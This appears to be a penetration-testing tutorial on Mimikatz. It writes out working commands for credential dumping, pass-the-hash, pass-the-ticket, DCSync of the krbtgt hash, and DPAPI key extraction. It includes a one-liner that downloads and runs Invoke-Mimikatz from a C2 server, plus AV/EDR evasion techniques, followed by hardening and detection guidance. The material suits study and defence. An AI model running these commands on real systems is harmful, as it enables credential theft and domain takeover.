Mimikatz Tutorial: A Deep Dive for Pentesters & Red Teamers

Mimikatz is an open-source tool that has become an indispensable utility for penetration testers and red teamers, primarily designed to extract sensitive information like plaintext passwords, NTLM hashes, Kerberos tickets, and more from Windows memory. If you're looking to understand how adversaries operate post-exploitation or to strengthen your own defenses, mastering Mimikatz is crucial for simulating realistic attacks and identifying critical vulnerabilities in Active Directory environments. This guide walks you through its core functionalities, practical applications, and essential defensive strategies.

Understanding Mimikatz: More Than Just a Credential Dumper

What is Mimikatz and Why is it Essential for Pentesters?

At its core, Mimikatz is a post-exploitation tool written by Benjamin Delpy (gentilkiwi) that interacts with the Windows Local Security Authority Subsystem Service (LSASS) process. LSASS is responsible for enforcing security policy on the system, including user authentication, and it stores credentials in various forms, making it a prime target for attackers. For pentesters and red teamers, Mimikatz offers a window into how an attacker can escalate privileges, move laterally, and ultimately achieve domain dominance once they gain initial access to a Windows machine.

From my experience on countless engagements, Mimikatz isn't just about dumping passwords; it's a versatile suite that enables a range of powerful attacks:

• Credential Dumping: Extracting plaintext passwords, NTLM hashes, and Kerberos tickets.
• Pass-the-Hash (PtH): Authenticating to services using NTLM hashes without knowing the plaintext password.
• Pass-the-Ticket (PtT): Authenticating to services using stolen Kerberos tickets (e.g., Golden Ticket, Silver Ticket attacks).
• DCSync: Requesting password hashes directly from a Domain Controller, simulating how a Domain Controller replicates data.
• DPAPI Master Key Extraction: Decrypting stored secrets like Wi-Fi passwords and browser credentials.

Key Takeaway: Mimikatz is a powerful multi-purpose tool that allows you to simulate advanced post-exploitation techniques, making it indispensable for understanding and testing Active Directory security.

Key Modules and Their Functions

Mimikatz operates through various modules, each designed for specific tasks. Getting familiar with these modules helps you pinpoint the right command for your objective.

Here's a breakdown of some commonly used modules:

Setting Up Your Mimikatz Environment

Acquiring Mimikatz: Official Sources and Considerations

The first step in any Mimikatz tutorial is getting the tool itself. The official source for Mimikatz is Benjamin Delpy's GitHub repository. You can compile it from source if you have Visual Studio installed, which is often recommended for better stealth, or download pre-compiled binaries from the releases section.

A crucial consideration when downloading Mimikatz is that almost all antivirus and Endpoint Detection and Response (EDR) solutions will flag it as malicious. This isn't because Mimikatz itself is malware, but because its capabilities are commonly abused by malware. When you're conducting legitimate penetration testing, you'll need to either disable AV (in a controlled lab environment only!) or use sophisticated evasion techniques. Many red teamers compile custom versions or use obfuscated loaders to bypass detection.

Initial Setup and Permissions for Mimikatz

To perform its core functions, Mimikatz needs elevated privileges. You can't just run it as a standard user and expect it to dump domain admin credentials. Here's what you need to know:

1. Run as Administrator: Always launch Mimikatz from an elevated command prompt or PowerShell session. Right-click the executable and select "Run as administrator."
2. Debug Privilege: Even with administrator rights, Mimikatz often needs the SeDebugPrivilege to access the LSASS process memory. You grant this within Mimikatz itself using the command:

   privilege::debug

   You should see a "'SeDebugPrivilege' OK" message if successful. Without this, many critical commands will fail.

3. Architecture Matching: Ensure you use the correct architecture version of Mimikatz. If you're on a 64-bit Windows system, use the x64 version. For 32-bit systems, use Win32 (or x86). Mismatching architectures will prevent Mimikatz from interacting with LSASS correctly.

Key Takeaway: Mimikatz requires administrative privileges and often SeDebugPrivilege to function. Always use the architecture-appropriate binary.

Practical Mimikatz Tutorial: Credential Dumping & Lateral Movement Techniques

Now, let's get hands-on. These are the commands and scenarios you'll use most often in a typical penetration test.

Dumping Local Credentials with sekurlsa::logonpasswords

This is probably the most famous Mimikatz command. It attempts to extract various credential types from the LSASS process memory, including plaintext passwords (if WDigest is enabled), NTLM hashes, Kerberos tickets, and more.

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

If successful, Mimikatz will output a wealth of information, often including:

• msv: Contains NTLM and LAN Manager (LM) hashes. NTLM hashes are still widely used for authentication.
• wdigest: Can contain plaintext passwords. WDigest stores credentials in memory for backward compatibility, but it's often disabled by default on modern Windows versions for security reasons.
• kerberos: Stores Kerberos tickets (TGTs and TGSs) for logged-on users.
• ssp, tspkg, credman: Other security providers that might hold credentials.

In a real-world scenario, you'd run this on a compromised workstation. Imagine you've gained a reverse shell on a developer's machine. Dumping credentials here could yield their domain user password or hash, which you can then use for lateral movement or privilege escalation.

Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) with Mimikatz

These techniques are crucial for lateral movement without knowing the actual plaintext password.

Pass-the-Hash (PtH)

PtH allows you to authenticate to a remote service using an NTLM hash instead of a plaintext password. This is incredibly effective in environments where users reuse passwords or where you've dumped hashes but not plaintext credentials.

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords  // Obtain the NTLM hash first
kerberos::pth /user:TARGET_USER /domain:TARGET_DOMAIN /ntlm:TARGET_HASH /run:cmd.exe

Replace TARGET_USER, TARGET_DOMAIN, and TARGET_HASH with the extracted credentials. The /run:cmd.exe parameter launches a new process (e.g., a command prompt) under the context of the authenticated user. From this new prompt, you can attempt to access network shares (dir \\TARGET_SERVER\C$) or other resources.

Pass-the-Ticket (PtT)

PtT involves injecting a stolen Kerberos ticket (either a Ticket Granting Ticket - TGT, or a Service Granting Ticket - TGS) into the current session to authenticate as another user or to a specific service. This is particularly potent with "Golden Tickets" (forged TGTs for any user) or "Silver Tickets" (forged TGSs for a specific service).

// Example: Injecting a TGT (often obtained via DCSync, covered next)
mimikatz.exe
privilege::debug
kerberos::ptt C:\Path\To\TGT.kirbi

Once injected, you can access Kerberos-authenticated services as the user associated with that ticket. This method bypasses traditional password authentication entirely.

Performing a DCSync Attack

The DCSync attack is a powerful technique that allows an attacker to simulate a Domain Controller and request password hashes directly from another Domain Controller. This means you don't need to compromise a DC directly; you just need credentials with specific replication privileges (e.g., Domain Admin, Enterprise Admin, or specific delegated permissions like 'Replicating Directory Changes All').

mimikatz.exe
privilege::debug
lsadump::dcsync /domain:YOUR_DOMAIN.LOCAL /user:krbtgt

This command instructs Mimikatz to request the NTLM hash for the krbtgt account from a Domain Controller. The krbtgt account is critical as its hash is used to sign all Kerberos TGTs. Possessing this hash allows you to forge "Golden Tickets," granting you indefinite access as any user in the domain.

You can also request hashes for specific users:

lsadump::dcsync /domain:YOUR_DOMAIN.LOCAL /user:TARGET_USER

DCSync is a red team favorite because it's stealthy and doesn't involve code injection into LSASS on the target DC. It simply uses legitimate directory replication protocols. For a pentester, successfully performing a DCSync often signifies a full domain compromise.

Extracting DPAPI Master Keys

The Data Protection API (DPAPI) is used by Windows to protect secrets like stored Wi-Fi passwords, EFS file encryption keys, and browser saved credentials. Mimikatz can extract DPAPI master keys, which can then be used to decrypt these secrets.

mimikatz.exe
privilege::debug
dpapi::masterkey /system

This command attempts to retrieve master keys from the local system. Once you have these keys, tools like SharpDPAPI or DPAPIkartz (a Mimikatz module) can decrypt various protected data. This is often a goldmine for finding more credentials or sensitive information.

You can find more detailed examples and advanced usage for many of these techniques in a comprehensive guide like a Metasploit Tutorial for Pentesters, as many post-exploitation frameworks integrate Mimikatz functionalities.

Advanced Mimikatz Usage and Evasion Techniques

While the basic commands are powerful, advanced red teamers often use Mimikatz in more sophisticated ways to avoid detection.

In-Memory Attacks and Reflective DLL Injection

Running Mimikatz directly from disk is noisy. Many advanced attacks involve loading Mimikatz reflectively into the memory of an existing process. This means the Mimikatz executable never touches the disk, making it harder for traditional antivirus solutions to detect. Tools like PowerShell-based Mimikatz wrappers (e.g., PowerSploit's Invoke-Mimikatz) or integration within C2 frameworks like Cobalt Strike use this approach.

// Example using Invoke-Mimikatz (PowerShell) - concept only, actual script is complex
IEX (New-Object Net.WebClient).DownloadString('http://your-c2-server/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

This method drastically reduces the forensic footprint and helps bypass disk-based detections.

Bypassing Antivirus and EDR with Mimikatz Variants

The cat-and-mouse game between attackers and defenders is constant. Mimikatz is a prime example. To bypass modern EDR solutions, attackers often:

• Custom Compilations: Modify the Mimikatz source code, change function names, encrypt strings, or inject junk code to alter its signature.
• Obfuscation: Use packers or obfuscators on the Mimikatz binary to make it harder for static analysis.
• Loader-based Evasion: Develop custom loaders that inject Mimikatz dynamically, often after performing various anti-analysis checks.
• Process Hollowing/Injection: Inject Mimikatz into a legitimate process (like explorer.exe or svchost.exe) to masquerade its activity.
• Using Alternatives: Sometimes, instead of Mimikatz itself, red teamers opt for specialized tools that perform specific Mimikatz-like functions, such as Rubeus for Kerberos attacks or Kekeo.

As a pentester, you need to understand these techniques, not just to use them responsibly, but also to advise clients on how to defend against them.

Defending Against Mimikatz Attacks

Understanding Mimikatz from a defensive perspective is just as important as knowing how to use it. Here’s how you can protect your Active Directory and endpoints.

Hardening Windows to Prevent Credential Theft

Preventing Mimikatz from working effectively requires a multi-layered approach:

1. Enable Credential Guard: Available on Windows 10 Enterprise, Server 2016+, Credential Guard uses virtualization-based security to isolate LSASS and prevent unauthorized access to credentials. Even if an attacker gains System privileges, they can't easily extract secrets from LSASS.
2. Enable LSA Protection (RunAsPPL): On systems where Credential Guard isn't feasible, you can enable LSA Protection (also known as PPL – Protected Process Light). This protects LSASS as a protected process, making it harder for non-Microsoft signed code (like Mimikatz) to inject into or debug it. You can configure this via Group Policy (Computer Configuration\Administrative Templates\System\LSA\Configure LSASS to run as a protected process) or a registry key (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1).
3. Disable WDigest: Ensure WDigest is disabled on all systems. This prevents plaintext passwords from being stored in LSASS memory. Modern Windows versions disable this by default, but it's worth checking legacy systems.
4. Restrict Admin Privileges: Adhere strictly to the principle of least privilege. Minimize the number of users with local administrator rights on workstations and servers. The fewer machines an attacker can run Mimikatz on, the better.
5. Implement Multi-Factor Authentication (MFA): While MFA doesn't stop PtH or PtT, it significantly mitigates the risk if an attacker only obtains a username and password. It prevents remote access even with valid credentials.
6. Regular Patching: Keep Windows and all software up-to-date. Microsoft frequently releases security updates that address vulnerabilities Mimikatz might exploit.

Detection Strategies for Mimikatz Activity

Even with strong preventative measures, detection is key. When prevention fails, early detection can minimize damage.

• Monitor LSASS Access:
  • Sysmon: Configure Sysmon to log process access (Event ID 10) to lsass.exe. Look for unusual processes attempting to open lsass.exe with specific access masks (e.g., 0x1410 for PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
  • Audit Policies: Enable advanced auditing for "Audit Process Creation" and "Audit Credential Validation."
• Endpoint Detection and Response (EDR): Modern EDR solutions are specifically designed to detect Mimikatz-like behavior, often by monitoring API calls, memory access patterns, and suspicious process interactions. They can flag attempts to load unsigned DLLs into critical processes or unusual access to sensitive memory regions.
• Log Analysis: Look for suspicious command-line activity (e.g., mimikatz.exe or common Mimikatz parameters), unusual service installations, or new processes spawned by unknown executables.
• Honeypots: Deploy "credential honeypots" (fake credentials in obscure locations) that, if accessed, trigger immediate alerts, indicating an attacker is actively dumping credentials.

For more insights into securing Windows environments and understanding common vulnerabilities, consider exploring resources on OWASP Top 10 Explained, which covers broader application security risks.

Key Takeaway: A robust defense against Mimikatz involves both preventing its core functionality through host hardening (Credential Guard, LSA Protection) and actively detecting its use through EDR and comprehensive logging.

Conclusion

Mimikatz remains a cornerstone tool for penetration testers and red teamers, offering unparalleled capabilities for credential harvesting, lateral movement, and privilege escalation within Windows and Active Directory environments. Understanding its modules, practical applications like PtH, PtT, and DCSync, and advanced evasion techniques is essential for anyone serious about offensive security.

However, true expertise comes from also understanding how to defend against these powerful attacks. By implementing robust security controls like Credential Guard, LSA Protection, and vigilant monitoring, organizations can significantly reduce their exposure to Mimikatz-driven threats. Always remember to use such powerful tools ethically and within authorized scopes, ensuring you contribute to a stronger, more secure digital world.

Frequently Asked Questions

What is Mimikatz primarily used for in penetration testing?

Mimikatz is primarily used in penetration testing for post-exploitation activities, specifically to extract sensitive authentication information like plaintext passwords, NTLM hashes, and Kerberos tickets from Windows memory, enabling lateral movement and privilege escalation.

Is Mimikatz illegal to use?

Mimikatz itself is not illegal. It's a legitimate security tool. Its legality depends entirely on its use. Using Mimikatz on systems you do not own or have explicit written permission to test is illegal and unethical. Always operate within authorized scope.

How can I detect Mimikatz activity on my network?

You can detect Mimikatz activity by monitoring for suspicious process access to lsass.exe (e.g., using Sysmon Event ID 10), analyzing endpoint logs for common Mimikatz command-line parameters, and deploying EDR solutions that are designed to flag behavioral anomalies associated with credential dumping.

What is the most effective defense against Mimikatz?

The most effective defense against Mimikatz is a combination of measures, including enabling Windows Credential Guard (on supported systems) or LSA Protection (RunAsPPL), implementing the principle of least privilege, disabling WDigest, and deploying a robust EDR solution with comprehensive logging and alerting for LSASS access.